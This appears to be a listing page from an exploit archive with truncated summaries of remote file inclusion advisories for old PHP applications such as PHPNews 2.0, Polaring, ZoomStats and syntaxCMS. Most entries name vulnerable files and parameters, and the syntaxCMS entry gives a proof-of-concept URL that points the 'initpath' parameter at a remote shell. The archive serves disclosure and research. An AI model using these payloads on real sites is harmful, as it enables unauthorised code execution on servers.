PHP_news 2.0 - user_user.php?language Remote File Inclusion

PHPnews 2.0 - useruser.php?language Remote File Inclusion source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to...

PHP_news 2.0 - creat_news_all.php?language Remote File Inclusion

PHPnews 2.0 - creatnewsall.php?language Remote File Inclusion source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to...

ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability

ToXiC BuG FounD by Drago84 Application Affect:ZoomStats Source Code: http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?usemirror=kent Problem: $GLOBALS'lib''db''path' array not declare Solution : $GLOBALS'lib''db''path' Page Vulnerable : mysql.php Dir Page: /libs/dbmax/ Exempe Of...

PHP_news 2.0 - 'user_user.php?language' Remote File Inclusion

source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected...

[Full-disclosure] Remote File Include in syntaxCMS

Remote File Include in syntaxCMS Vulnerable File: 0004initurls.php Vulnerable Code: 1 ?php 2 includeonce $initpath . '/init.urls.php' ; 3 ? PoC: http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004initurls.php?initpath=http://YourShell?& Solution: Remove This File...it's not needed...ju...

PHP_news 2.0 - admincatagory.php?language Remote File Inclusion

PHPnews 2.0 - admincatagory.php?language Remote File Inclusion source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker t...

PBLang <= 4.66z (temppath) Remote File Include Vulnerability

No description provided by source. ============================================================================================== Software PBLang = v4.66z temppath Remote File Inclusion Exploit =============================================================================================== Critica...

Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability

No description provided by source. ============================================================================================== Minerva = v238 phpbbrootpath Remote File Inclusion Exploit =============================================================================================== Critical Lev...

Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability

No description provided by source. ToXiC Polaring Remote File Include BuG FounD by Drago84 Application Affect: Polaring Remote File Include Source Code: http://sourceforge.net/project/showfiles.php?groupid=150989&packageid=166837&releaseid=444225 Problem: require$SESSION'dirMain'.'/view/css.php';...

Polaring 0.04.03 - general.php Remote File Inclusion

Polaring 0.04.03 - general.php Remote File Inclusion ToXiC Polaring Remote File Include BuG FounD by Drago84 Application Affect: Polaring Remote File Include Source Code: http://sourceforge.net/project/showfiles.php?groupid=150989&packageid=166837&releaseid=444225 Problem:...

faceStones personal <= 2.0.42 (fs_form_links.php) File Include Vuln

No description provided by source. ============================================================================================== faceStones personal = v2.0.42 objpath Remote File Inclusion Exploit ===============================================================================================...

Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications =================================================================== Polaring = 0.04.03 general.php Remote File Include Vulnerability =================================================================== ToXiC Polaring Remote File Include BuG...

evoBB <= 0.3 (path) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ===================================================== evoBB = 0.3 path Remote File Include Vulnerability =====================================================...

PHP_news 2.0 - &#039;/admin/catagory.php?language&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected...

BBSNew 2.0.1 - index2.php Remote File Inclusion

BBSNew 2.0.1 - index2.php Remote File Inclusion source: https://www.securityfocus.com/bid/20204/info bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary...

evoBB &lt;= 0.3 (path) Remote File Include Vulnerability

No description provided by source. ============================================================================================== evoBB = v0.3 path Remote File Inclusion Exploit =============================================================================================== Critical Level :...

PHP_news 2.0 - adminnews.php?language Remote File Inclusion

PHPnews 2.0 - adminnews.php?language Remote File Inclusion source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to...

PHP_news 2.0 - &#039;/admin/news.php?language&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/20209/info PHPNews is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected...

Back-End CMS 0.4.5 - &#039;/admin/index.php?includes_path&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected...

ZoomStats &lt;= 1.0.2 (mysql.php) Remote File Include Vulnerability

No description provided by source. ToXiC BuG FounD by Drago84 Application Affect:ZoomStats Source Code: http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?usemirror=kent Problem: $GLOBALS'lib''db''path' array not declare Solution : $GLOBALS'lib''db''path' Page Vulnerable : mysql.ph...